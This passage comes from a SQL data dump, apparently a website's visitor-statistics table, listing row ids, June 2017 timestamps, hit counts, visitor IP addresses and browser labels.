132.30','other'),(119233,1496872291,1,1,0,0,'51.255.65.79','other'),(119234,1496872521,1,1,0,0,'217.182.132.186','other'),(119235,1496872627,1,0,1,0,'68.180.230.48',''),(119236,1496872828,1,1,0,0,'51.255.65.70','other'),(119237,1496873590,1,1,0,0,'109.236.81.160','chrome'),(119238,1496874484,1,1,0,0,'5.196.87.175','other'),(119239,1496875068,1,1,0,0,'164.132.161.80','other'),(119240,1496875338,1,1,0,0,'66.249.76.107','chrome'),(119241,1496875388,1,1,0,0,'109.236.81.160','chrome'),(119242,1496876066,1,1,0,0,'217.182.132.4','other'),(119243,1496876297,1,1,0,0,'164.132.161.66','other'),(119244,1496876317,1,1,0,0,'217.182.132.87','other'),(119245,1496876542,1,0,1,0,'68.180.230.48',''),(119246,1496876933,1,1,0,0,'8.29.198.27','other'),(119247,1496877188,1,1,0,0,'109.236.81.160','chrome'),(119248,1496877796,1,1,0,0,'164.132.161.90','other'),(119249,1496878072,1,1,0,0,'51.255.65.7','other'),(119250,1496878125,1,1,0,0,'180.76.15.148','other'),(119251,1496878201,1,1,0,0,'5.196.87.171','other'),(119252,1496878358,1,1,0,0,'66.249.76.91','chrome'),(119253,1496878539,1,1,0,0,'91.209.11.236','other'),(119254,1496878653,1,0,1,0,'66.249.66.195',''),(119255,1496878906,1,1,0,0,'217.182.132.7','other'),(119256,1496878988,1,1,0,0,'109.236.81.160','chrome'),(119257,1496880379,1,1,0,0,'91.209.11.236','other'),(119258,1496880788,1,1,0,0,'109.236.81.160','chrome'),(119259,1496881568,1,1,0,0,'51.255.65.43','other'),(119260,1496881967,1,1,0,0,'51.255.65.23','other'),(119261,1496882256,1,1,0,0,'51.255.71.122','other'),(119262,1496882369,1,1,0,0,'164.132.161.81','other'),(119263,1496882588,1,1,0,0,'109.236.81.160','chrome'),(119264,1496882725,2,0,2,0,'66.249.76.89',''),(119265,1496882822,1,1,0,0,'180.76.15.6','other'),(119266,1496883028,3,3,0,0,'91.209.11.236','other'),(119267,1496884158,1,1,0,0,'217.182.132.95','other'),(119268,1496884254,1,1,0,0,'157.55.39.188','other'),(119269,1496884388,1,1,0,0,'109.236.81.160','chrome'),(119270,1496884443,1,1,0,0,'66.249.76.109','chrome'),(119271,1496885042,1,1,0,0,'95.108.213.34','other'),(119272,1496885054,1,1,0,0,'141.8.142.154','other'),(119273,1496885113,1,1,0,0,'5.196.87.175','other'),(119274,1496885133,1,1,0,0,'5.255.253.63','other'),(119275,1496885236,1,1,0,0,'141.8.142.15','other'),(119276,1496885244,1,1,0,0,'217.182.132.31','other'),(119277,1496885496,1,0,1,0,'66.249.76.108',''),(119278,1496885783,1,1,0,0,'91.209.11.236','other'),(119279,1496886189,1,1,0,0,'109.236.81.160','chrome'),(119280,1496886225,1,1,0,0,'163.172.30.231','other'),(119281,1496886533,1,1,0,0,'178.154.200.64','other'),(119282,1496886537,1,1,0,0,'95.108.179.15','other'),(119283,1496886744,1,1,0,0,'141.8.132.43','other'),(119284,1496886791,1,1,0,0,'141.8.183.1','other'),(119285,1496886824,1,1,0,0,'37.9.113.5','other'),(119286,1496886843,1,1,0,0,'164.132.161.56','other'),(119287,1496886853,1,1,0,0,'178.154.189.3','other'),(119288,1496886901,1,1,0,0,'164.132.161.29','other'),(119289,1496886934,1,1,0,0,'164.132.161.61','other'),(119290,1496887034,1,1,0,0,'66.249.76.91','chrome'),(119291,1496887549,1,1,0,0,'5.9.138.93','firefox'),(119292,1496887627,1,1,0,0,'91.209.11.236','other'),(119293,1496887801,1,1,0,0,'8.29.198.26','other'),(119294,1496887990,1,1,0,0,'109.236.81.160','chrome'),(119295,1496888120,1,0,1,0,'66.249.76.89',''),(119296,1496888331,1,0,1,0,'66.249.66.195',''),(119297,1496888466,1,1,0,0,'51.255.65.57','other'),(119298,1496888621,1,1,0,0,'109.192.228.149','chrome'),(119299,1496888897,1,1,0,0,'51.255.65.27','other'),(119300,1496889197,1,1,0,0,'217.182.132.170','other'),(119301,1496889246,1,1,0,0,'91.209.11.236','other'),(119302,1496889496,1,1,0,0,'51.255.65.12','other'),(119303,1496889789,1,1,0,0,'109.236.81.160','chrome'),(119304,1496890326,1,0,1,0,'66.249.76.108',''),(119305,1496890906,1,1,0,0,'91.209.11.236','other'),(119306,1496890945,8,8,0,0,'208.110.66.130','firefox'),(119307,1496890946,2,2,0,0,'208.110.66.130','msie'),(119308,1496891273,1,1,0,0,'217.182.132.82','other'),(119309,1496891589,1,1,0,0,'109.236.81.160','chrome'),(119310,1496891632,1,1,0,0,'164.132.161.40','other'),(119311,1496891845,1,1,0,0,'217.182.132.193','other'),(119312,1496892169,1,1,0,0,'164.132.161.8','other'),(119313,1496892394,1,1,0,0,'217.182.132.152','other'),(119314,1496892836,1,1,0,0,'141.8.142.164','other'),(119315,1496893389,1,1,0,0,'109.236.81.160','chrome'),(119316,1496893397,1,1,0,0,'217.182.132.73','other'),(119317,1496893503,1,1,0,0,'51.255.65.72','other'),(119318,1496894004,2,2,0,0,'5.255.253.63','other'),(119319,1496894075,2,2,0,0,'95.108.179.15','other'),(119320,1496894224,1,1,0,0,'141.8.142.38','other'),(119321,1496894242,2,2,0,0,'141.8.142.15','other'),(119322,1496894303,1,1,0,0,'164.132.161.71','other'),(119323,1496894349,2,2,0,0,'87.250.224.7','other'),(119324,1496894386,2,2,0,0,'141.8.142.154','other'),(119325,1496894459,1,1,0,0,'51.255.65.48','other'),(119326,1496894474,1,1,0,0,'5.196.87.175','other'),(119327,1496894660,1,1,0,0,'91.209.11.236','other'),(119328,1496894913,1,1,0,0,'66.249.76.93','chrome'),(119329,1496895174,1,1,0,0,'51.255.65.84','other'),(119330,1496895188,1,1,0,0,'109.236.81.160','chrome'),(119331,1496895536,1,0,1,0,'66.249.76.91',''),(119332,1496895615,1,1,0,0,'217.182.132.34','other'),(119333,1496896156,1,1,0,0,'207.46.13.112','other'),(119334,1496896255,1,1,0,0,'164.132.162.187','other'),(119335,1496896325,1,1,0,0,'217.182.132.95','other'),(119336,1496896635,2,2,0,0,'91.209.11.236','other'),(119337,1496896655,1,0,1,0,'66.249.66.201',''),(119338,1496896989,1,1,0,0,'109.236.81.160','chrome'),(119339,1496896997,1,1,0,0,'87.250.224.7','other'),(119340,1496897014,1,1,0,0,'178.154.200.45','other'),(119341,1496897056,1,1,0,0,'95.108.213.34','other'),(119342,1496897064,1,1,0,0,'141.8.142.164','other'),(119343,1496897069,1,1,0,0,'95.108.213.8','other'),(119344,1496897074,1,1,0,0,'141.8.142.15','other'),(119345,1496897079,1,1,0,0,'95.108.181.13','other'),(119346,1496897083,1,1,0,0,'93.158.152.79','other'),(119347,1496897247,69,69,0,0,'94.199.151.22','other'),(119348,1496897377,1,1,0,0,'51.255.65.18','other'),(119349,1496897407,1,1,0,0,'164.132.161.97','other'),(119350,1496897587,1,0,1,0,'66.249.76.108',''),(119351,1496897995,2,0,2,0,'66.249.66.199',''),(119352,1496898203,2,2,0,0,'95.108.179.15','other'),(119353,1496898391,1,1,0,0,'141.8.142.15','other'),(119354,1496898446,1,1,0,0,'141.8.142.164','other'),(119355,1496898468,1,1,0,0,'5.255.253.81','other'),(119356,1496898473,1,1,0,0,'91.209.11.236','other'),(119357,1496898555,1,1,0,0,'164.132.161.32','other'),(119358,1496898655,1,1,0,0,'8.29.198.25','other'),(119359,1496898781,1,1,0,0,'157.55.39.67','other'),(119360,1496898789,1,1,0,0,'109.236.81.160','chrome'),(119361,1496898846,1,1,0,0,'5.196.87.173','other'),(119362,1496899051,1,1,0,0,'217.182.132.28','other'),(119363,1496899387,1,1,0,0,'91.209.11.236','other'),(119364,1496899389,1,1,0,0,'51.255.65.60','other'),(119365,1496899492,1,1,0,0,'164.132.161.41','other'),(119366,1496899516,2,2,0,0,'141.8.142.164','other'),(119367,1496899526,1,1,0,0,'66.249.66.201','chrome'),(119368,1496899573,1,1,0,0,'91.196.178.72','chrome'),(119369,1496899599,1,1,0,0,'141.8.142.15','other'),(119370,1496899750,1,1,0,0,'5.255.253.28','other'),(119371,1496899987,1,1,0,0,'51.255.65.67','other'),(119372,1496900129,1,1,0,0,'164.132.161.33','other'),(119373,1496900317,1,1,0,0,'217.182.132.56','other'),(119374,1496900669,2,2,0,0,'95.108.213.34','other'),(119375,1496900707,2,2,0,0,'141.8.142.154','other'),(119376,1496900815,1,1,0,0,'87.250.224.7','other'),(119377,1496900835,1,0,1,0,'66.249.76.89',''),(119378,1496900876,1,1,0,0,'141.8.142.97','other'),(119379,1496900952,1,1,0,0,'66.249.76.91','chrome'),(119380,1496900986,1,1,0,0,'141.8.142.38','other'),(119381,1496900994,1,1,0,0,'217.182.132.16','other'),(119382,1496901035,1,1,0,0,'66.249.76.93','chrome'),(119383,1496901059,1,1,0,0,'217.182.132.84','other'),(119384,1496901381,1,1,0,0,'157.55.39.67','other'),(119385,1496901960,1,1,0,0,'164.132.161.73','other'),(119386,1496902316,1,1,0,0,'178.154.200.37','other'),(119387,1496902390,1,1,0,0,'95.108.179.15','other'),(119388,1496902435,1,1,0,0,'164.132.161.44','other'),(119389,1496902590,1,1,0,0,'217.182.132.35','other'),(119390,1496902646,1,0,1,0,'66.249.66.158',''),(119391,1496902768,1,1,0,0,'51.255.65.64','other'),(119392,1496902802,1,1,0,0,'141.8.142.154','other'),(119393,1496902807,1,1,0,0,'95.108.213.34','other'),(119394,1496903031,1,1,0,0,'5.196.87.174','other'),(119395,1496903371,1,0,1,0,'66.249.76.108',''),(119396,1496903579,1,1,0,0,'51.255.65.93','other'),(119397,1496903664,1,1,0,0,'137.74.203.194','other'),(119398,1496903974,1,1,0,0,'91.196.178.69','chrome'),(119399,1496904126,1,1,0,0,'130.180.211.44','chrome'),(119400,1496905014,1,0,1,0,'66.249.66.195',''),(119401,1496905139,2,2,0,0,'91.209.11.236','other'),(119402,1496905649,1,1,0,0,'217.182.132.5','other'),(119403,1496905866,1,1,0,0,'164.132.161.3','other'),(119404,1496906348,1,1,0,0,'5.196.87.171','other'),(119405,1496906353,1,1,0,0,'66.249.76.91','chrome'),(119406,1496906573,1,0,1,0,'66.249.66.156',''),(119407,1496906734,1,0,1,0,'68.180.230.48',''),(119408,1496906870,1,1,0,0,'37.53.185.45','chrome'),(119409,1496906880,1,0,1,0,'66.249.66.199',''),(119410,1496907067,1,1,0,0,'51.255.65.19','other'),(119411,1496907068,1,1,0,0,'217.182.132.187','other'),(119412,1496907312,1,1,0,0,'66.102.9.38','chrome'),(119413,1496907331,1,1,0,0,'91.209.11.236','other'),(119414,1496907500,1,0,1,0,'66.249.76.89',''),(119415,1496907526,1,0,1,0,'66.249.76.91',''),(119416,1496907611,1,1,0,0,'94.179.246.23','chrome'),(119417,1496907904,1,1,0,0,'164.132.161.9','other'),(119418,1496908440,1,0,1,0,'66.249.76.108',''),(119419,1496908450,1,1,0,0,'40.77.167.126','other'),(119420,1496908472,2,2,0,0,'91.209.11.236','other'),(119421,1496908650,1,0,1,0,'66.249.76.91',''),(119422,1496908949,1,1,0,0,'51.255.65.74','other'),(119423,1496909105,1,1,0,0,'217.182.132.50','other'),(119424,1496909287,1,1,0,0,'195.211.173.159','chrome'),(119425,1496909302,1,1,0,0,'94.179.246.23','chrome'),(119426,1496909329,1,1,0,0,'91.196.178.38','chrome'),(119427,1496909332,1,1,0,0,'141.8.142.15','other'),(119428,1496909342,1,1,0,0,'95.108.213.34','other'),(119429,1496909454,1,1,0,0,'92.112.109.230','chrome'),(119430,1496909461,1,1,0,0,'217.182.132.5','other'),(119431,1496909471,1,1,0,0,'51.255.65.43','other'),(119432,1496909502,1,1,0,0,'8.29.198.25','other'),(119433,1496909538,1,1,0,0,'51.255.71.125','other'),(119434,1496909594,1,1,0,0,'91.196.178.99','chrome'),(119435,1496909723,2,1,1,0,'66.249.76.109',''),(119436,1496909890,1,1,0,0,'123.31.20.69','other'),(119437,1496910053,1,1,0,0,'51.255.65.66','other'),(119438,1496910078,1,1,0,0,'91.196.178.166','chrome'),(119439,1496910350,1,0,1,0,'66.249.76.91',''),(119440,1496910578,1,1,0,0,'91.196.178.69','chrome'),(119441,1496910579,2,2,0,0,'163.172.73.215','other'),(119442,1496911243,1,1,0,0,'217.182.132.17','other'),(119443,1496911360,1,1,0,0,'5.196.87.172','other'),(119444,1496911541,1,1,0,0,'137.74.201.108','other'),(119445,1496912121,1,1,0,0,'123.31.20.69','other'),(119446,1496912139,1,1,0,0,'217.182.132.79','other'),(119447,1496912328,1,1,0,0,'217.182.132.174','other'),(119448,1496912428,1,1,0,0,'91.196.178.67','chrome'),(119449,1496912461,1,1,0,0,'164.132.161.33','other'),(119450,1496912587,1,1,0,0,'164.132.161.66','other'),(119451,1496912743,1,1,0,0,'217.107.127.40','chrome'),(119452,1496912753,1,1,0,0,'178.186.108.208','chrome'),(119453,1496912832,1,1,0,0,'91.209.11.236','other'),(119454,1496913165,1,1,0,0,'51.255.65.25','other'),(119455,1496913185,1,1,0,0,'51.255.65.72','other'),(119456,1496913319,1,1,0,0,'130.180.218.203','chrome'),(119457,1496913633,1,1,0,0,'91.196.178.169','chrome'),(119458,1496913775,3,3,0,0,'91.209.11.236','other'),(119459,1496914108,40,40,0,0,'69.30.201.74','other'),(119460,1496914261,1,1,0,0,'66.249.76.89','chrome'),(119461,1496914302,1,1,0,0,'164.132.161.52','other'),(119462,1496914361,1,1,0,0,'137.74.207.170','other'),(119463,1496914409,1,1,0,0,'66.249.76.107','chrome'),(119464,1496914790,1,0,1,0,'68.180.230.48',''),(119465,1496914802,1,1,0,0,'217.182.132.25','other'),(119466,1496915009,1,1,0,0,'91.237.107.22','chrome'),(119467,1496915235,1,1,0,0,'5.196.87.175','other'),(119468,1496915532,2,2,0,0,'91.209.11.236','other'),(119469,1496915845,1,0,1,0,'68.180.230.48',''),(119470,1496915858,1,1,0,0,'51.255.65.18','other'),(119471,1496915876,1,1,0,0,'164.132.161.49','other'),(119472,1496915923,1,1,0,0,'137.74.201.99','other'),(119473,1496916083,1,0,1,0,'66.249.76.93',''),(119474,1496916108,1,1,0,0,'137.74.207.119','other'),(119475,1496916682,1,1,0,0,'217.182.132.97','other'),(119476,1496916841,1,1,0,0,'164.132.161.16','other'),(119477,1496916860,1,1,0,0,'217.182.132.181','other'),(119478,1496916868,1,1,0,0,'217.182.132.184','other'),(119479,1496916929,1,1,0,0,'164.132.162.159','other'),(119480,1496917051,1,1,0,0,'51.255.65.80','other'),(119481,1496917216,1,1,0,0,'217.182.132.146','other'),(119482,1496917413,1,1,0,0,'91.196.178.166','chrome'),(119483,1496917913,1,1,0,0,'66.249.76.108','chrome'),(119484,1496918036,1,1,0,0,'157.55.39.67','other'),(119485,1496918543,2,2,0,0,'91.229.121.3','chrome'),(119486,1496918559,1,1,0,0,'164.132.161.31','other'),(119487,1496918793,1,1,0,0,'164.132.162.188','other'),(119488,1496919257,1,1,0,0,'5.196.87.171','other'),(119489,1496919361,1,1,0,0,'112.111.161.248','msie'),(119490,1496919384,1,1,0,0,'46.101.186.145','other'),(119491,1496919521,1,1,0,0,'40.77.167.126','other'),(119492,1496919744,1,1,0,0,'217.182.132.152','other'),(119493,1496919917,1,0,1,0,'66.249.66.157',''),(119494,1496920218,1,0,1,0,'66.249.76.91',''),(119495,1496920350,1,1,0,0,'8.29.198.26','other'),(119496,1496920541,1,1,0,0,'40.77.167.126','other'),(119497,1496920758,1,0,1,0,'66.249.76.89',''),(119498,1496920791,1,1,0,0,'94.179.246.23','chrome'),(119499,1496920957,1,1,0,0,'91.124.83.158','chrome'),(119500,1496921348,1,1,0,0,'51.255.65.71','other'),(119501,1496921487,1,1,0,0,'66.249.76.89','chrome'),(119502,1496921661,1,1,0,0,'66.249.76.93','chrome'),(119503,1496921731,1,1,0,0,'37.53.3.145','chrome'),(119504,1496921819,1,1,0,0,'95.135.225.74','chrome'),(119505,1496921936,1,0,1,0,'66.249.66.195',''),(119506,1496921960,2,2,0,0,'91.196.177.26','chrome'),(119507,1496921974,1,1,0,0,'95.132.21.94','firefox'),(119508,1496922219,1,1,0,0,'213.111.209.109','chrome'),(119509,1496922295,1,1,0,0,'193.150.59.131','firefox'),(119510,1496922677,1,0,1,0,'66.249.66.158',''),(119511,1496922955,1,1,0,0,'51.255.71.127','other'),(119512,1496923098,2,0,2,0,'66.249.76.89',''),(119513,1496923180,1,1,0,0,'51.255.65.76','other'),(119514,1496923262,1,0,1,0,'66.249.76.91',''),(119515,1496923362,1,0,1,0,'66.249.66.156',''),(119516,1496923804,1,1,0,0,'81.7.9.181','chrome'),(119517,1496923822,1,1,0,0,'95.108.213.34','other'),(119518,1496923896,1,1,0,0,'51.255.71.123','other'),(119519,1496923914,1,1,0,0,'51.255.65.71','other'),(119520,1496923954,5,5,0,0,'91.209.11.236','other'),(119521,1496924031,1,1,0,0,'5.196.87.171','other'),(119522,1496924095,1,1,0,0,'51.255.65.30','other'),(119523,1496924459,1,1,0,0,'217.182.132.23','other'),(119524,1496924507,1,0,1,0,'66.249.76.89',''),(119525,1496925218,1,1,0,0,'217.69.134.178','other'),(119526,1496925236,1,1,0,0,'51.255.71.120','other'),(119527,1496925844,1,1,0,0,'54.165.59.7','other'),(119528,1496926264,1,0,1,0,'66.249.76.93',''),(119529,1496926554,1,1,0,0,'91.209.11.236','other'),(119530,1496926762,1,1,0,0,'51.255.71.101','other'),(119531,1496926789,1,1,0,0,'185.137.18.236','chrome'),(119532,1496927222,1,1,0,0,'217.182.132.59','other'),(119533,1496927598,1,1,0,0,'51.255.65.16','other'),(119534,1496928114,1,1,0,0,'5.196.87.175','other'),(119535,1496928235,1,0,1,0,'68.180.230.48',''),(119536,1496928558,1,1,0,0,'164.132.161.18','other'),(119537,1496928562,1,1,0,0,'164.132.161.22','other'),(119538,1496928565,1,1,0,0,'95.132.21.94','firefox'),(119539,1496928580,1,1,0,0,'87.250.224.16','other'),(119540,1496928618,1,1,0,0,'188.166.84.224','chrome'),(119541,1496928878,1,1,0,0,'91.196.178.104','firefox'),(119542,1496929180,1,1,0,0,'91.237.14.219','chrome'),(119543,1496929482,1,1,0,0,'109.192.228.149','other'),(119544,1496929925,1,1,0,0,'217.182.132.76','other'),(119545,1496930133,1,0,1,0,'66.249.76.89',''),(119546,1496930241,1,1,0,0,'188.40.110.15','chrome'),(119547,1496930285,1,1,0,0,'91.196.178.131','firefox'),(119548,1496930933,1,0,1,0,'66.249.66.158',''),(119549,1496931195,1,1,0,0,'8.29.198.26','other'),(119550,1496931516,1,1,0,0,'193.93.184.171','chrome'),(119551,1496931527,1,1,0,0,'164.132.161.47','other'),(119552,1496931700,1,1,0,0,'51.255.65.29','other'),(119553,1496931726,1,1,0,0,'217.182.132.179','other'),(119554,1496931730,1,1,0,0,'164.132.161.77','other'),(119555,1496931874,1,0,1,0,'66.249.76.108',''),(119556,1496932057,1,1,0,0,'188.40.110.15','chrome'),(119557,1496932187,1,1,0,0,'5.196.87.173','other'),(119558,1496932941,1,1,0,0,'51.255.71.126','other'),(119559,1496933112,1,1,0,0,'51.255.65.62','other'),(119560,1496933116,1,1,0,0,'51.255.71.116','other'),(119561,1496933511,1,1,0,0,'51.255.65.81','other'),(119562,1496933536,1,1,0,0,'82.145.221.242','chrome'),(119563,1496933936,1,1,0,0,'164.132.161.2','other'),(119564,1496934334,1,0,1,0,'68.180.230.48',''),(119565,1496934530,1,0,1,0,'66.249.76.109',''),(119566,1496934703,1,1,0,0,'180.76.15.141','other'),(119567,1496934877,1,1,0,0,'217.182.132.156','other'),(119568,1496935177,1,1,0,0,'188.40.110.15','chrome'),(119569,1496936079,1,1,0,0,'217.182.132.191','other'),(119570,1496936126,1,1,0,0,'5.196.87.174','other'),(119571,1496936302,1,1,0,0,'199.58.86.209','other'),(119572,1496936441,1,1,0,0,'145.255.1.80','chrome'),(119573,1496936644,1,1,0,0,'164.132.161.92','other'),(119574,1496937324,1,1,0,0,'51.255.65.75','other'),(119575,1496937583,1,1,0,0,'51.255.65.74','other'),(119576,1496938140,1,1,0,0,'51.255.65.41','other'),(119577,1496938234,1,1,0,0,'164.132.161.13','other'),(119578,1496938446,1,1,0,0,'95.108.213.7','other'),(119579,1496938519,2,2,0,0,'91.209.11.236','other'),(119581,1496938535,1,1,0,0,'66.249.66.199','chrome'),(119582,1496938624,1,1,0,0,'164.132.161.15','other'),(119583,1496938680,1,0,1,0,'66.249.76.91',''),(119584,1496939088,1,0,1,0,'68.180.230.48',''),(119585,1496939156,1,1,0,0,'137.74.203.194','other'),(119586,1496939819,1,1,0,0,'164.132.161.23','other'),(119587,1496939906,1,1,0,0,'217.182.132.28','other'),(119588,1496940048,1,1,0,0,'40.77.167.126','other'),(119589,1496940122,1,1,0,0,'217.182.132.66','other'),(119590,1496940129,1,1,0,0,'5.196.87.172','other'),(119591,1496940289,1,1,0,0,'95.108.213.34','other'),(119592,1496941579,1,0,1,0,'66.249.76.93',''),(119593,1496941771,1,1,0,0,'141.8.142.15','other'),(119594,1496941772,1,1,0,0,'91.196.178.103','firefox'),(119595,1496941866,1,1,0,0,'51.255.65.84','other'),(119596,1496942010,1,1,0,0,'51.255.65.5','other'),(119597,1496942039,1,1,0,0,'8.29.198.25','other'),(119598,1496942163,1,1,0,0,'51.255.64.106','other'),(119599,1496942275,1,0,1,0,'66.249.76.108',''),(119600,1496942795,1,1,0,0,'51.255.65.87','other'),(119601,1496942851,1,1,0,0,'217.182.132.53','other'),(119602,1496943186,1,0,1,0,'68.180.230.48',''),(119603,1496943229,1,1,0,0,'217.182.132.56','other'),(119604,1496943606,1,1,0,0,'91.196.178.72','chrome'),(119605,1496943949,1,1,0,0,'217.182.132.70','other'),(119606,1496944057,1,1,0,0,'164.132.161.97','other'),(119607,1496944187,1,1,0,0,'95.108.213.34','other'),(119608,1496944864,1,1,0,0,'109.236.90.92','chrome'),(119609,1496944895,1,0,1,0,'66.249.76.108',''),(119610,1496944976,1,1,0,0,'217.182.132.15','other'),(119611,1496945373,1,1,0,0,'5.196.87.174','other'),(119612,1496945533,1,1,0,0,'91.196.178.68','chrome'),(119613,1496945692,2,2,0,0,'95.108.179.15','other'),(119614,1496945695,3,3,0,0,'141.8.142.15','other'),(119615,1496946002,2,2,0,0,'87.250.224.7','other'),(119616,1496946055,1,1,0,0,'164.132.162.158','other'),(119617,1496946057,2,2,0,0,'141.8.142.154','other'),(119618,1496946661,1,1,0,0,'109.236.90.92','chrome'),(119619,1496946662,1,1,0,0,'51.255.65.57','other'),(119620,1496946698,1,1,0,0,'91.209.11.236','other'),(119621,1496946896,1,1,0,0,'95.108.179.15','other'),(119622,1496946967,1,1,0,0,'141.8.132.39','other'),(119623,1496947424,1,1,0,0,'217.182.132.240','other'),(119624,1496947498,1,1,0,0,'164.132.161.19','other'),(119625,1496947760,1,1,0,0,'66.249.76.108','chrome'),(119626,1496948012,1,1,0,0,'95.108.179.15','other'),(119627,1496948143,1,1,0,0,'217.182.132.180','other'),(119628,1496948210,1,1,0,0,'141.8.142.154','other'),(119629,1496948462,1,1,0,0,'109.236.90.92','chrome'),(119630,1496948543,1,0,1,0,'66.249.66.157',''),(119631,1496948719,1,1,0,0,'91.196.178.68','chrome'),(119632,1496948723,1,1,0,0,'95.132.45.28','chrome'),(119633,1496949098,1,1,0,0,'51.255.65.6','other'),(119634,1496949494,1,0,1,0,'68.180.230.48',''),(119635,1496949688,1,1,0,0,'5.196.87.174','other'),(119636,1496950427,1,1,0,0,'51.255.65.64','other'),(119637,1496950460,1,1,0,0,'66.249.76.93','chrome'),(119638,1496950720,2,1,1,0,'66.249.76.89',''),(119639,1496951090,1,1,0,0,'51.255.65.51','other'),(119640,1496951355,1,1,0,0,'137.74.207.116','other'),(119641,1496951801,1,1,0,0,'51.255.71.126','other'),(119642,1496951937,1,1,0,0,'164.132.161.71','other'),(119643,1496952513,1,1,0,0,'176.31.231.10','other'),(119644,1496952751,1,1,0,0,'91.196.178.161','chrome'),(119645,1496952873,1,1,0,0,'8.29.198.25','other'),(119646,1496952884,1,1,0,0,'157.55.39.67','other'),(119647,1496953101,1,1,0,0,'87.250.224.7','other'),(119648,1496953357,1,1,0,0,'95.108.179.15','other'),(119649,1496953604,1,1,0,0,'51.255.65.22','other'),(119650,1496953701,1,1,0,0,'5.196.87.174','other'),(119651,1496953713,1,1,0,0,'51.255.65.69','other'),(119652,1496953760,1,1,0,0,'217.182.132.81','other'),(119653,1496954276,1,0,1,0,'66.249.76.108',''),(119654,1496954538,1,1,0,0,'51.255.65.40','other'),(119655,1496954985,1,1,0,0,'51.255.65.72','other'),(119656,1496954992,1,1,0,0,'109.236.91.29','chrome'),(119657,1496955463,1,1,0,0,'95.108.213.34','other'),(119658,1496955703,1,0,1,0,'66.249.76.93',''),(119659,1496955707,1,1,0,0,'217.182.132.93','other'),(119660,1496955757,1,1,0,0,'217.182.132.82','other'),(119661,1496955776,1,1,0,0,'164.132.161.4','other'),(119662,1496956013,2,2,0,0,'91.209.11.236','other'),(119663,1496956026,1,1,0,0,'66.249.66.201','chrome'),(119664,1496956220,1,0,1,0,'66.249.76.109',''),(119665,1496956791,1,1,0,0,'109.236.91.29','chrome'),(119666,1496956915,1,1,0,0,'95.108.179.15','other'),(119667,1496957066,1,1,0,0,'137.74.207.102','other'),(119668,1496957257,1,0,1,0,'66.249.76.89',''),(119669,1496957638,1,1,0,0,'217.182.132.37','other'),(119670,1496957670,1,0,1,0,'68.180.230.48',''),(119671,1496957768,1,1,0,0,'66.249.76.89','chrome'),(119672,1496958240,1,1,0,0,'5.196.87.174','other'),(119673,1496958273,1,1,0,0,'5.255.253.58','other'),(119674,1496958294,1,1,0,0,'5.255.253.28','other'),(119675,1496958297,1,1,0,0,'141.8.142.28','other'),(119676,1496958301,1,1,0,0,'95.108.213.7','other'),(119677,1496958590,1,1,0,0,'109.236.91.29','chrome'),(119678,1496959408,1,1,0,0,'217.182.132.75','other'),(119679,1496960014,1,1,0,0,'217.182.132.67','other'),(119680,1496960390,1,1,0,0,'109.236.91.29','chrome'),(119681,1496960768,1,1,0,0,'137.74.207.109','other'),(119682,1496961162,1,1,0,0,'51.255.65.49','other'),(119683,1496961576,1,1,0,0,'66.249.66.195','chrome'),(119684,1496961598,1,1,0,0,'51.255.65.5','other'),(119685,1496961741,1,1,0,0,'164.132.161.94','other'),(119686,1496961891,1,1,0,0,'51.255.65.18','other'),(119687,1496962190,1,1,0,0,'109.236.91.29','chrome'),(119688,1496962254,1,1,0,0,'217.182.132.72','other'),(119689,1496962281,1,1,0,0,'40.77.167.126','other'),(119690,1496962292,1,1,0,0,'5.196.87.174','other'),(119691,1496963086,1,1,0,0,'66.249.66.199','chrome'),(119692,1496963542,1,0,1,0,'66.249.76.93',''),(119693,1496963579,1,1,0,0,'66.249.66.201','chrome'),(119694,1496963721,1,1,0,0,'8.29.198.27','other'),(119695,1496963964,1,1,0,0,'164.132.161.78','other'),(119696,1496963991,1,1,0,0,'109.236.91.29','chrome'),(119697,1496964020,1,0,1,0,'66.249.66.157',''),(119698,1496964070,1,1,0,0,'51.255.65.6','other'),(119699,1496964100,1,1,0,0,'66.249.66.199','chrome'),(119700,1496964418,1,1,0,0,'51.255.65.50','other'),(119701,1496964420,1,1,0,0,'217.182.132.5','other'),(119702,1496964863,1,0,1,0,'66.249.76.91',''),(119703,1496965185,1,1,0,0,'217.182.132.56','other'),(119704,1496965636,1,1,0,0,'164.132.161.2','other'),(119705,1496965679,1,1,0,0,'164.132.161.27','other'),(119706,1496965790,1,1,0,0,'109.236.91.29','chrome'),(119707,1496965937,1,1,0,0,'164.132.161.35','other'),(119708,1496966631,1,1,0,0,'51.255.71.118','other'),(119709,1496966679,1,0,1,0,'68.180.230.48',''),(119710,1496966792,1,1,0,0,'137.74.207.108','other'),(119711,1496966880,1,1,0,0,'164.132.161.54','other'),(119712,1496967590,1,1,0,0,'109.236.91.29','chrome'),(119713,1496967708,1,1,0,0,'5.196.87.174','other'),(119714,1496968046,1,0,1,0,'66.249.76.107',''),(119715,1496968362,1,1,0,0,'217.182.132.155','other'),(119716,1496968469,1,1,0,0,'164.132.161.42','other'),(119717,1496968542,1,1,0,0,'164.132.161.81','other'),(119718,1496968599,1,1,0,0,'217.182.132.151','other'),(119719,1496969275,1,1,0,0,'164.132.161.77','other'),(119720,1496969390,1,1,0,0,'109.236.91.29','chrome'),(119721,1496969563,1,1,0,0,'164.132.161.3','other'),(119722,1496969822,1,0,1,0,'66.249.66.158',''),(119723,1496970308,1,0,1,0,'66.249.76.89',''),(119724,1496971190,1,1,0,0,'109.236.91.29','chrome'),(119725,1496971643,1,1,0,0,'164.132.162.160','other'),(119726,1496971787,1,1,0,0,'164.132.161.6','other'),(119727,1496971817,1,1,0,0,'51.255.65.63','other'),(119728,1496971945,1,1,0,0,'217.182.132.55','other'),(119729,1496972101,2,1,1,0,'66.249.76.108',''),(119730,1496972129,1,1,0,0,'217.182.132.240','other'),(119731,1496972320,1,1,0,0,'217.182.132.28','other'),(119732,1496972358,1,0,1,0,'66.249.76.93',''),(119733,1496972441,1,1,0,0,'217.182.132.188','other'),(119734,1496972687,1,1,0,0,'5.196.87.173','other'),(119735,1496972722,1,1,0,0,'217.182.132.191','other'),(119736,1496972864,1,1,0,0,'51.255.65.30','other'),(119737,1496972991,1,1,0,0,'109.236.91.29','chrome'),(119738,1496973312,1,1,0,0,'217.182.132.153','other'),(119739,1496973423,1,0,1,0,'66.249.76.107',''),(119740,1496973775,17,17,0,0,'208.43.225.85','other'),(119741,1496973830,23,23,0,0,'208.43.225.84','other'),(119742,1496974141,1,0,1,0,'68.180.230.48',''),(119743,1496974559,1,1,0,0,'8.29.198.26','other'),(119744,1496974790,1,1,0,0,'109.236.91.29','chrome'),(119745,1496974798,1,1,0,0,'217.182.132.87','other'),(119746,